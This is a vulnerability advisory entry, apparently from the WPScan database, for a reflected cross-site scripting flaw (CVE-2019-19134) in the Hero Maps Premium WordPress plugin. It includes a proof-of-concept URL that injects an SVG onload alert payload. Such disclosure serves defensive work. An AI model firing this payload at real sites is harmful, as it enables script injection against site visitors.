Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Proof of Concept
http://example.com/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(%27XSS%20in%20Hero%20Maps%20Premium%202.1.6%27)%22%3E

Affects Plugin

fixed in version 2.2.3

References

CVE 2019-19134
URL https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
URL https://heroplugins.com/changelogs/hmaps/changelog.txt

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Hooper Labs
Views 2673
Verified No
WPVDB ID 10095

Timeline

Publicly Published 2020-02-25 (4 months ago)
Added 2020-02-26 (4 months ago)
Last Updated 2020-02-27 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin